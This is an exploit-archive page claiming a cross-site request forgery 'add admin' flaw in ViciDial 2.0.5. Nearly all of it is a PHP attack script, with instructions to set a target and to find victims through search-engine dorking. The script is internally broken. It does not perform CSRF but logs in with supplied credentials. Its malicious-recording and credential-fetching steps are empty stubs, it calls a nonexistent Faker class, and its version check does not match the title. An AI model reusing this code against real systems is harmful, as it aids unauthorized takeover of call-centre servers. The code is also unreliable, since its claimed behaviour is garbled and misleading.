exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ViciDial 2.0.5 Cross Site Request Forgery

ViciDial 2.0.5 Cross Site Request Forgery
Posted Oct 3, 2024
Authored by indoushka

ViciDial version 2.0.5 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 8d97cf3df17b56471dae55b00de7d5fdb6df05ba2d778c815ad038c1c5af4ade

ViciDial 2.0.5 Cross Site Request Forgery

Change Mirror Download
=============================================================================================================================================
| # Title : ViciDial Call Center - astguiclient - thirtieth public release 2.0.5 CSRF Add ADmin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://github.com/inktel/Vicidial/archive/refs/heads/master.zip |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code add new admin .

[+] Line 172 set your target. ( $exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1'); )

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :


<?php
class VICIdialExploit {
private $username;
private $password;
private $targetUri;
private $headers;

public function __construct($username, $password, $targetUri) {
$this->username = $username;
$this->password = $password;
$this->targetUri = $targetUri;
$this->headers = array(
'Authorization' => 'Basic ' . base64_encode($username . ':' . $password)
);
}

public function check() {
$response = $this->sendRequest('GET', $this->targetUri . '/agc/vicidial.php');
if ($response['code'] != 200) {
return 'Unknown';
}

$version_info = $this->extractVersion($response['body']);
if (!$version_info) {
return 'Unknown';
}

$current_version = $this->compareVersion($version_info, '2.14-917a');
return ($current_version <= 0) ? 'Vulnerable' : 'Safe';
}

private function extractVersion($html) {
preg_match("/VERSION:\s*(\d+\.\d+)-(\d+)/", $html, $matches);
return isset($matches[0]) ? $matches[0] : null;
}

private function compareVersion($current, $vulnerable) {
return version_compare($current, $vulnerable);
}

public function exploit() {
$this->startService();
$this->authenticateAdmin();
$this->updateUserSettings();
$this->updateSystemSettings();
$campaignData = $this->createDummyCampaign();
$this->updateCampaignSettings($campaignData['id']);
$this->createDummyList($campaignData['list_name'], $campaignData['id']);
$phoneCreds = $this->fetchPhoneCredentials();
$this->agentPortalAuthentication($phoneCreds['extension'], $phoneCreds['password'], $campaignData['id']);
$this->insertMaliciousRecording($phoneCreds['recording_extension']);
$this->deleteDummyCampaign($campaignData['id']);
$this->waitForCronJob();
}

private function startService() {
// Starting HTTP service logic
}

private function sendRequest($method, $url, $body = null) {
$options = array(
'http' => array(
'method' => $method,
'header' => implode("\r\n", $this->headers)
)
);
if ($body) {
$options['http']['content'] = http_build_query($body);
}
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);

return array(
'code' => $http_response_header[0],
'body' => $result
);
}

private function authenticateAdmin() {
$response = $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '3', 'user' => $this->username));
if ($response['code'] != 200) {
throw new Exception('Failed to authenticate with credentials.');
}
echo 'Authenticated successfully as user ' . $this->username;
}

private function updateUserSettings() {
$faker = new Faker\Generator();
$userSettings = array(
'ADD' => '4A',
'user' => $this->username,
'pass' => $this->password,
'full_name' => $faker->name,
'user_group' => 'ADMIN',
'phone_login' => $faker->userName,
'phone_pass' => $faker->password,
'active' => 'Y',
'vicidial_recording' => '1'
);
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $userSettings);
echo 'Updated user settings';
}

private function updateSystemSettings() {
// Fetching system settings logic and making changes
}

private function createDummyCampaign() {
$faker = new Faker\Generator();
$campaignId = rand(100000, 999999);
$listId = $campaignId + 1;
$campaignName = $faker->company;

$campaignSettings = array(
'ADD' => '21',
'campaign_id' => $campaignId,
'campaign_name' => $campaignName,
'user_group' => '---ALL---',
'active' => 'Y'
);
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);
echo 'Created dummy campaign ' . $campaignName;

return array('name' => $campaignName, 'id' => $campaignId, 'list_name' => $campaignName . ' List', 'list_id' => $listId);
}

private function updateCampaignSettings($campaignId) {
$campaignSettings = array(
'ADD' => '41',
'campaign_id' => $campaignId,
'active' => 'Y',
'auto_dial_level' => '1'
);
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);
echo 'Updated dummy campaign settings';
}

private function createDummyList($listName, $campaignId) {
$listSettings = array(
'ADD' => '211',
'list_name' => $listName,
'campaign_id' => $campaignId,
'active' => 'Y'
);
$this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $listSettings);
echo 'Created dummy list ' . $listName;
}

private function fetchPhoneCredentials() {
// Fetching phone credentials logic
}

private function agentPortalAuthentication($extension, $password, $campaignId) {
// Agent portal authentication logic
}

private function insertMaliciousRecording($recordingExtension) {
// Inserting malicious recording logic
}

private function deleteDummyCampaign($campaignId) {
$this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '61', 'campaign_id' => $campaignId, 'CoNfIrM' => 'YES'));
echo 'Deleted dummy campaign ' . $campaignId;
}

private function waitForCronJob() {
// Waiting for cron job logic
}
}

// Usage example:
$exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1');
$exploit->check();
$exploit->exploit();
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close